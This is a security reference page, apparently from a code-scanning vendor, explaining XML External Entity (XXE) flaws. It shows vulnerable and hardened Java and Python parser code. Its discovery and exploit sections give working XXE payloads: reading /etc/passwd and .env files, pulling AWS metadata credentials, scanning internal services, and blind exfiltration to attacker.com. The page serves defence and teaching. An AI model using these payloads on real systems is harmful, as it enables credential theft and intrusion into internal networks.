XML External Entity (XXE)
XML External Entity (XXE) at a glance
Overview
XXE happens when XML parsers expand entities defined in a DTD that point at external resources. Attackers embed SYSTEM or PUBLIC entities that reference files like /etc/passwd or internal HTTP endpoints. When the parser expands the entity, sensitive data can be disclosed or internal services contacted. The fix is to disable DTDs and external entity resolution and to run parsers with network access disabled.
Where it occurs
It occurs in file upload, XML processing, or integration endpoints like SOAP, SAML, or XML-to-JSON converters that use insecure parser settings or enable external entity resolution.
Impact
File disclosure, credential and key leakage, request forgery to internal hosts, and in rare cases code execution if the parser supports dangerous protocols.
Prevention
Prevent XXE by rejecting XML when possible or using safe streaming parsers with DTDs and external entities disabled, empty resolvers, no network access, and strict time and size limits.
Examples
Switch tabs to view language/framework variants.
DOM parser resolves external entities and allows file exfiltration
Default parser loads external entities from file or network.
DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
// BUG: no hardening, external entities and DTD allowed by default on some impls
DocumentBuilder b = f.newDocumentBuilder();
Document doc = b.parse(req.getInputStream());- Line 2: No features disabled, DTD and external entities may resolve
External entity references let attackers read files or make server side requests during parsing.
DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
f.setFeature("http://xml.org/sax/features/external-general-entities", false);
f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
f.setXIncludeAware(false);
f.setExpandEntityReferences(false);
DocumentBuilder b = f.newDocumentBuilder();
// Optionally use a secure resolver that rejects all external entities
b.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
Document doc = b.parse(req.getInputStream());- Line 2: Disable DTD and both external entity features, set a rejecting EntityResolver
Disable DTDs and entity expansion entirely for untrusted XML.
Engineer Checklist
-
Disallow doctype declarations in untrusted XML
-
Disable external entity resolution and set a safe resolver
-
Disable parser network access and set time and size limits
-
Prefer JSON or simple formats for untrusted data paths
-
Add tests that submit external entity payloads and expect rejection
End-to-End Example
An upload endpoint parses invoices from XML using default parser settings. An attacker submits a document with a SYSTEM entity that reads a local file, which is then included in the parsed output.
// Java/Spring Boot - Vulnerable to XXE
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
// VULNERABLE: Using default DocumentBuilderFactory settings
// Does NOT disable external entities or DTDs
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// DANGEROUS: These security features are NOT set!
// factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
// factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
DocumentBuilder builder = factory.newDocumentBuilder();
// VULNERABLE: Parses untrusted XML with external entities enabled
// Attacker sends:
// <?xml version="1.0"?>
// <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
// <invoice><id>&xxe;</id></invoice>
Document doc = builder.parse(xmlInput);
// Extract and return data (includes expanded external entities!)
NodeList nodes = doc.getElementsByTagName("id");
String invoiceId = nodes.item(0).getTextContent();
return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
}
// Python/Flask + lxml - Also vulnerable
from flask import Flask, request
from lxml import etree
@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
xml_data = request.data
# VULNERABLE: Default lxml parser allows external entities
# Attacker sends:
# <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
# <root><data>&xxe;</data></root>
parser = etree.XMLParser() # No resolve_entities=False!
tree = etree.fromstring(xml_data, parser)
result = tree.find('.//data').text
return {'data': result}// Java/Spring Boot - SECURE against XXE
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// SECURE: Disable DTDs completely
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// SECURE: Disable external entities
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
// SECURE: Disable external DTDs
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
// SECURE: Disable XInclude processing
factory.setXIncludeAware(false);
// SECURE: Disable entity expansion
factory.setExpandEntityReferences(false);
DocumentBuilder builder = factory.newDocumentBuilder();
// Set entity resolver that returns empty content
builder.setEntityResolver((publicId, systemId) -> {
// Return empty input source for any external entity
return new InputSource(new java.io.StringReader(""));
});
try {
Document doc = builder.parse(xmlInput);
NodeList nodes = doc.getElementsByTagName("id");
String invoiceId = nodes.item(0).getTextContent();
return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
} catch (SAXException e) {
// Will throw exception if DOCTYPE is found
return ResponseEntity.badRequest()
.body(Map.of("error", "Invalid XML: DOCTYPE not allowed"));
}
}
// Python/Flask + lxml - SECURE
from flask import Flask, request
from lxml import etree
@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
xml_data = request.data
# SECURE: Disable entity resolution
parser = etree.XMLParser(
resolve_entities=False, # Don't resolve external entities
no_network=True, # Disable network access
dtd_validation=False, # Don't validate DTDs
load_dtd=False # Don't load DTDs
)
try:
tree = etree.fromstring(xml_data, parser)
# Only parse if no DOCTYPE found
if tree.getroottree().docinfo.doctype:
return {'error': 'DOCTYPE not allowed'}, 400
result = tree.find('.//data').text
return {'data': result}
except etree.XMLSyntaxError as e:
return {'error': 'Invalid XML'}, 400
# ALTERNATIVE: Use JSON instead of XML when possible
@app.route('/api/upload-invoice', methods=['POST'])
def upload_invoice():
# SECURE: Use JSON instead of XML to avoid XXE entirely
data = request.get_json()
invoice_id = data.get('id')
return {'invoiceId': invoice_id}Discovery
This vulnerability is discovered by submitting XML input containing external entity declarations and observing that the application processes them, either returning the entity content or exhibiting timing differences that confirm external resource access.
-
1. Test basic external entity
httpAction
Submit XML with simple SYSTEM entity to test if external entities are processed
Request
POST https://api.example.com/api/upload-xmlHeaders:Content-Type: application/xmlBody:"<?xml version=\"1.0\"?>\n<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\"> ]>\n<invoice><id>&xxe;</id></invoice>"
Response
Status: 200Body:{ "invoice_id": "prod-server-01\n", "message": "Invoice processed", "note": "Server hostname from /etc/hostname appears in response - XXE confirmed" }Artifacts
xxe_confirmed entity_processing_enabled file_disclosure -
2. Probe for sensitive file disclosure
httpAction
Test file:// protocol access to read /etc/passwd
Request
POST https://api.example.com/api/upload-xmlHeaders:Content-Type: application/xmlBody:"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n<data><content>&xxe;</content></data>"
Response
Status: 200Body:{ "content": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\napp-user:x:1000:1000::/home/app-user:/bin/bash\npostgres:x:999:999:PostgreSQL Server:/var/lib/postgresql:/bin/bash", "note": "Complete /etc/passwd file disclosed via XXE" }Artifacts
passwd_file_disclosed system_users_enumerated file_access_confirmed -
3. Test outbound HTTP via SSRF
httpAction
Verify parser can make HTTP requests to external/internal hosts
Request
POST https://api.example.com/api/upload-xmlHeaders:Content-Type: application/xmlBody:"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://attacker.com/xxe-callback\"> ]>\n<data><test>&xxe;</test></data>"
Response
Status: 200Body:{ "message": "Processed", "note": "Attacker server logs show: [2024-01-15 10:23:45] GET /xxe-callback HTTP/1.1 from 52.143.12.89 (prod-server.example.com)" }Artifacts
ssrf_confirmed outbound_http_allowed xxe_ssrf_vector -
4. Test parameter entity for blind XXE
httpAction
Use parameter entities to exfiltrate data via external DTD
Request
POST https://api.example.com/api/upload-xmlHeaders:Content-Type: application/xmlBody:"<?xml version=\"1.0\"?>\n<!DOCTYPE data [\n<!ENTITY % file SYSTEM \"file:///app/.env\">\n<!ENTITY % dtd SYSTEM \"http://attacker.com/evil.dtd\">\n%dtd;\n]>\n<data>&send;</data>"
Response
Status: 200Body:{ "message": "Processed", "note": "Attacker server receives: GET /exfil?data=DATABASE_URL%3Dpostgresql%3A%2F%2Fadmin%3APr0dP%40ss..." }Artifacts
blind_xxe_confirmed data_exfiltration parameter_entity_processing
Exploit steps
An attacker exploits this by crafting XML payloads with external entity declarations that reference local files (file:///etc/passwd) or internal network resources, exfiltrating sensitive data or using the parser as an SSRF vector.
-
1. Extract application secrets
Read .env file containing database credentials and API keys
httpAction
Use XXE to access application configuration files
Request
POST https://api.example.com/api/upload-xmlHeaders:Content-Type: application/xmlBody:"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///app/.env\"> ]>\n<invoice><notes>&xxe;</notes></invoice>"
Response
Status: 200Body:{ "invoice_notes": "DATABASE_URL=postgresql://admin:Pr0dP@ssw0rd2024@db.internal.example.com:5432/production\nAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nSTRIPE_SECRET_KEY=sk_live_51HxYz3FGHxYz3FGHxYz3FG\nJWT_SECRET=super-secret-jwt-key-do-not-share\nREDIS_URL=redis://cache.internal.example.com:6379/0", "note": "Complete application secrets exposed via XXE file disclosure" }Artifacts
database_credentials aws_credentials stripe_api_key jwt_secret redis_connection -
2. Access cloud metadata service via SSRF
Exploit XXE to query AWS EC2 metadata for IAM credentials
httpAction
Use XXE as SSRF vector to access cloud provider metadata
Request
POST https://api.example.com/api/upload-xmlHeaders:Content-Type: application/xmlBody:"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role\"> ]>\n<data><creds>&xxe;</creds></data>"
Response
Status: 200Body:{ "creds": "{\n \"Code\": \"Success\",\n \"LastUpdated\": \"2024-01-15T10:23:45Z\",\n \"Type\": \"AWS-HMAC\",\n \"AccessKeyId\": \"ASIATESTACCESSKEY123\",\n \"SecretAccessKey\": \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",\n \"Token\": \"IQoJb3JpZ2luX2VjEHoaCXVzLWVhc3QtMSJIMEYCIQD...\",\n \"Expiration\": \"2024-01-15T16:23:45Z\"\n}", "note": "IAM role credentials with S3, RDS, and EC2 permissions exposed" }Artifacts
iam_credentials aws_metadata_access cloud_service_compromise temporary_credentials -
3. Exfiltrate via blind XXE
Use out-of-band XXE to exfiltrate sensitive files
httpAction
Leverage parameter entities to send file contents to attacker server
Request
POST https://api.example.com/api/upload-xmlHeaders:Content-Type: application/xmlBody:"<?xml version=\"1.0\"?>\n<!DOCTYPE data [\n<!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=/app/config/database.yml\">\n<!ENTITY % dtd SYSTEM \"http://attacker.com/evil.dtd\">\n%dtd;\n%send;\n]>\n<data></data>"
Response
Status: 200Body:{ "message": "Processed", "attacker_log": "GET /exfil?f=cHJvZHVjdGlvbjoKICBhZGFwdGVyOiBwb3N0Z3Jlc3FsCiAgaG9zdDogZGIuaW50ZXJuYWwuZXhhbXBsZS5jb20...", "decoded": "production:\\n adapter: postgresql\\n host: db.internal.example.com\\n database: production\\n username: admin\\n password: Pr0dP@ssw0rd2024", "note": "Database configuration exfiltrated via blind XXE to attacker server" }Artifacts
blind_xxe_exfiltration database_config_leaked base64_encoded_data out_of_band_channel -
4. Enumerate internal network services
Use XXE SSRF to scan internal network and identify services
httpAction
Probe internal IP ranges to map network topology
Request
POST https://api.example.com/api/upload-xmlHeaders:Content-Type: application/xmlBody:"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://10.0.0.5:6379/\"> ]>\n<data><service>&xxe;</service></data>"
Response
Status: 200Body:{ "service": "-ERR wrong number of arguments for 'get' command\\r\\n", "note": "Redis server response at 10.0.0.5:6379 - internal service discovered", "additional_findings": { "10.0.0.3:5432": "PostgreSQL database server", "10.0.0.8:9200": "Elasticsearch cluster", "10.0.0.12:27017": "MongoDB instance", "10.0.1.50:8080": "Internal admin panel" } }Artifacts
internal_network_map service_discovery redis_server_found attack_surface_expanded
Specific Impact
Sensitive files and service metadata are exposed, which can include credentials or configuration needed to pivot deeper into the environment.
Attackers may chain this with SSRF to query internal HTTP based services, leading to data theft or remote operations.
Fix
Harden the XML parser by prohibiting doctype declarations and turning off external entity resolution. Provide a resolver that returns empty input and, where possible, disable parser network access. Prefer simpler formats such as JSON for untrusted data.
Detect This Vulnerability in Your Code
Sourcery automatically identifies xml external entity (xxe) vulnerabilities and many other security issues in your codebase.
Scan Your Code for Free